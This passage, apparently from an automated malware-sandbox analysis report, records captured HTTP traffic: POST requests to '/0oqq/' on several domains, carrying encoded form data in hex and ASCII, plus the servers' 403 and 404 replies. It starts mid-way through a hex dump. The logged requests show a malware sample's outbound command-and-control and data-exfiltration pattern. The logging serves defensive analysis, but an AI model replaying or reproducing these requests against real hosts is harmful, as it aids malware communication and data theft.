4d 44 58 42 64 77 64 49 69 7e 66 44 53 50 30 51 4f 5a 4a 6e 2d 39 52 44 66 41 52 28 45 6f 36 7e 65 56 7a 4f 58 64 53 49 74 36 61 4b 31 55 70 6c 59 49 4e 39 69 35 48 78 6a 6f 77 30 79 45 4a 36 51 66 6d 37 64 42 63 28 44 39 79 4c 41 6a 6a 48 62 79 76 5a 31 33 71 47 55 4e 5a 51 6b 6c 69 4d 30 66 48 5a 44 66 48 57 35 41 33 46 57 45 6d 35 35 69 31 41 71 36 39 5a 4b 41 4c 51 56 45 68 74 7a 34 34 6c 4a 6d 4a 47 41 63 58 74 5a 33 65 7e 58 41 53 53 2d 74 2d 69 4a 55 77 41 4e 49 42 4e 64 43 6e 58 6c 7e 75 66 76 4b 48 28 70 73 66 55 35 55 4d 49 53 64 77 56 4b 65 76 69 31 42 59 36 71 47 57 30 75 70 35 70 79 44 31 50 58 65 41 39 51 49 46 49 72 31 62 64 76 78 41 4f 65 4d 70 6a 78 4f 38 50 46 52 4e 48 43 73 53 56 49 68 59 6c 76 54 70 50 33 67 69 31 34 30 50 6f 4b 51 5f 32 45 68 61 4a 5f 75 31 4b 6e 7a 36 47 5a 4b 6c 58 6b 68 49 67 43 30 73 79 64 49 2d 55 31 72 71 28 59 4a 55 72 2d 44 2d 67 64 32 57 43 59 32 75 4b 35 5a 46 4e 68 31 7a 69 4b 55 50 38 59 53 39 77 30 58 39 4c 68 
28 44 74 56 49 43 6a 5a 35 39 4f 55 59 31 79 34 45 2d 43 34 76 53 6e 42 58 47 4b 59 56 66 6c 4f 47 56 63 5a 38 77 6d 7a 69 65 43 38 52 59 33 44 4f 59 73 45 67 49 64 37 4a 55 37 46 30 65 47 42 47 70 58 32 42 43 6d 52 64 56 67 67 4c 65 52 33 44 31 78 36 38 45 61 6b 45 57 32 45 6a 4a 34 31 38 5a 49 5f 79 57 46 55 61 6a 33 34 30 6c 6f 6d 79 58 47 66 4e 4d 51 31 47 72 42 30 50 46 7a 62 76 4d 7e 4a 54 6e 33 50 4c 42 34 55 31 4d 77 6f 6f 2d 74 6e 7a 75 58 30 55 6d 53 6f 38 7a 53 71 4a 4b 51 4f 31 56 28 63 70 59 61 56 6c 66 75 45 47 36 76 70 56 56 35 30 48 54 4e 46 4d 38 4b 50 45 38 38 6d 35 71 62 66 69 36 68 73 54 64 46 35 68 66 68 50 32 57 45 68 65 4d 65 5f 64 62 64 62 7a 64 54 74 75 5a 64 72 39 4b 7a 4b 66 35 34 37 54 75 32 6f 77 55 47 6d 31 48 6a 42 77 49 49 32 48 58 30 55 30 68 51 70 64 64 42 6a 77 50 48 33 6a 76 28 74 44 5a 50 52 65 71 72 4c 7e 38 77 62 63 51 58 63 33 4e 48 65 69 45 6e 64 68 76 4b 77 5a 4f 79 77 34 70 73 36 4c 69 51 45 31 79 56 46 4d 61 59 76 76 6b 49 64 35 6e 55 51 32 5a 7a 6e 57 36 6d 42 42 6d 71 31 4
          Source: global traffic
          HTTP traffic detected: POST /0oqq/ HTTP/1.1
          Host: www.virginhairweave.co.uk
          Connection: close
          Content-Length: 189
          Cache-Control: no-cache
          Origin: http://www.virginhairweave.co.uk
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.virginhairweave.co.uk/0oqq/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00
          Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 42 66 51 58 64 4a 44 7a 71 49 55 59 63 59 66 54 44 54 68 52 72 58 6b 32 6d 66 6c 69 6c 62 45 6b 47 31 41 32 39 4b 36 63 72 62 33 5f 4f 64 37 71 55 33 31 43 35 4c 4c 65 56 65 54 6f 31 70 72 72 38 55 33 35 6f 38 49 31 6a 5f 4f 46 6b 4c 38 33 57 47 68 37 63 39 63 4d 76 51 4e 4c 4f 6a 68 30 71 6d 28 48 62 6b 4a 75 6f 48 55 33 50 61 74 75 68 4d 57 55 73 45 49 56 47 32 72 74 4e 73 4e 52 63 34 46 53 75 74 63 53 33 51 30 50 41 5f 45 7a 36 53 70 67 4c 5f 79 65 37 36 5a 48 48 71 67 33 4a 6f 4e 6b 68 66 43 72 73 6a 7a 71 51 30 30 35 63 42 62 34 53 4b 79 67 68 6c 43 5a 65 6b 45 48 68 70 61 4a 6e 64 51 30 6b 59 50 6e 6f 53 38 47 34 65 70 4e 35 35 59 65 69 42 56 38 65 78 70 6d 73 4d 6e 34 56 48 31 79 41 45 46 6e 76 38 6e 77 75 46 56 79 43 4c 35 58 64 32 75 4b 53 37 43 44 32 5f 49 53 78 51 66 71 44 49 6f 41 4e 75 57 6a 51 30 79 44 50 45 59 43 4e 51 64 35 74 53 50 4b 56 4c 36 6c 36 4c 46 37 6c 43 31 36 67 47 6e 58 41 4c 58 49 58 7a 37 69 6a 6b 75 48 4a 4c 65 38 61 39 4e 61 37 67 77 50 59 72 36 58 6f 78 45 6c 4d 56 32 77 66 70 6d 43 42 66 41 59 5a 6b 43 63 41 65 56 74 71 44 76 64 76 6f 70 30 4e 41 7a 58 75 52 7e 2d 6e 43 57 4e 39 6e 67 68 65 64 7e 52 4e 46 6b 77 48 33 73 4b 70 4b 30 6d 61 36 4b 37 53 68 67 5a 67 66 61 33 53 72 72 2d 31 32 64 43 59 57 6a 69 39 66 71 58 66 42 63 30 63 35 77 44 46 48 43 56 49 53 55 77 44 78 75 33 37 4c 79 52 58 67 33 64 68 79 36 42 4f 49 7e 50 31 48 50 78 53 55 72 52 50 47 76 67 49 30 77 4a 38 39 6c 6a 4d 31 52 6e 59 78 39 71 71 6c 59 32 55 
4c 6d 55 4c 4a 61 52 69 68 6a 66 6c 74 66 74 45 54 78 6b 53 6f 39 34 78 46 66 50 69 4d 78 6f 67 65 28 67 71 5a 31 49 67 34 50 6b 4d 4c 4d 58 46 71 28 4b 4d 43 34 33 74 34 4b 6f 4c 6e 6d 2d 36 47 35 64 7e 67 51 53 44 67 4e 46 73 76 79 64 6d 48 54 42 35 4d 48 41 67 33 53 69 51 75 79 73 6b 35 39 44 74 53 7e 72 35 31 47 35 49 43 61 77 71 54 4a 53 4f 6b 39 6a 79 46 41 7a 73 4a 35 31 42 66 7e 46 54 6e 46 33 79 71 77 6c 73 7a 57 50 34 75 4a 42 66 2d 6b 4d 50 46 59 72 55 43 41 78 67 39 69 68 71 59 6b 48 6a 32 4d 37 4e 44 78 63 4a 63 64 47 63 56 61 48 6b 31 6f 57 61 59 4d 72 51 57 59 31 4d 47 47 62 73 7a 46 30 75 6f 4a 6e 73 74 42 46 71 45 32 41 6e 6f 41 6e 28 42 35 6c 30 4b 68 44 4c 30 62 76 57 58 73 79 41 61 4e 43 75 48 58 62 56 75 31 6d 4a 5a 37 6f 43 68 49 5a 54 5f 73 6e 6b 4d 63 6f 77 78 6e 69 50 52 6e 7a 41 34 61 61 47 58 5a 32 54 6a 68 53 42 31 37 51 46 59 55 39 72 64 67 51 7e 32 44 61 5a 62 6b 70 49 56 4b 72 4f 57 37 79 28 68 6b 47 73 68 7e 52 75 6b 73 63 66 48 77 2d 4c 53 74 6c 43 32 4f 74 65 39 35 33 48 66 39 70 68 4
          Source: global traffic
          HTTP traffic detected: POST /0oqq/ HTTP/1.1
          Host: www.dirdikyepedia.com
          Connection: close
          Content-Length: 189
          Cache-Control: no-cache
          Origin: http://www.dirdikyepedia.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.dirdikyepedia.com/0oqq/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Raw: 49 43 48 79 76 6a 35 3d 43 54 34 69 37 44 66 32 4d 59 41 6c 70 46 45 77 4f 66 44 41 6f 67 75 42 6d 5a 48 65 61 71 79 7a 50 69 4c 4d 59 43 74 6b 46 66 6e 54 5a 7a 76 6b 72 6f 5a 79 62 48 6c 6b 42 39 76 43 53 38 77 63 42 6c 67 75 6d 61 54 73 30 6b 6c 47 51 68 4a 4d 61 52 36 4b 6f 54 75 6b 42 71 43 4e 30 4b 38 47 71 2d 58 34 59 2d 6d 77 71 6d 59 4f 35 39 68 6a 66 4c 46 74 41 4d 4c 42 37 32 4b 30 54 6d 31 78 46 5f 62 35 39 75 4a 66 6b 47 65 4b 64 43 7e 49 63 6d 76 59 65 79 48 6b 32 71 38 43 55 6e 4e 4f 39 61 64 71 59 66 53 4d 4c 4b 33 4f 38 2d 71 35 64 67 29 2e 00 00 00 00 00 00 00 00
          Data Ascii: ICHyvj5=CT4i7Df2MYAlpFEwOfDAoguBmZHeaqyzPiLMYCtkFfnTZzvkroZybHlkB9vCS8wcBlgumaTs0klGQhJMaR6KoTukBqCN0K8Gq-X4Y-mwqmYO59hjfLFtAMLB72K0Tm1xF_b59uJfkGeKdC~IcmvYeyHk2q8CUnNO9adqYfSMLK3O8-q5dg).
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 403 Forbidden
          server: openresty/1.13.6.1
          date: Mon, 20 Mar 2023 08:08:33 GMT
          content-type: text/html
          content-length: 175
          x-fail-reason: Bad Actor
          connection: close
          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 403 Forbidden
          server: openresty/1.13.6.1
          date: Mon, 20 Mar 2023 08:08:39 GMT
          content-type: text/html
          content-length: 175
          x-fail-reason: Bad Actor
          connection: close
          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:08:55 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 
65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:08:58 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 
65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:09:10 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 
65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          date: Mon, 20 Mar 2023 08:09:29 GMT
          content-type: text/html; charset=iso-8859-1
          transfer-encoding: chunked
          vary: Accept-Encoding
          server: Apache
          x-origin-cache-status: MISS
          x-cdn-cache-status: MISS
          x-via: FRA1
          connection: close
          Data Raw: 43 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
          Data Ascii: C4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:09:48 GMTServer: ApacheContent-Length: 16056Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 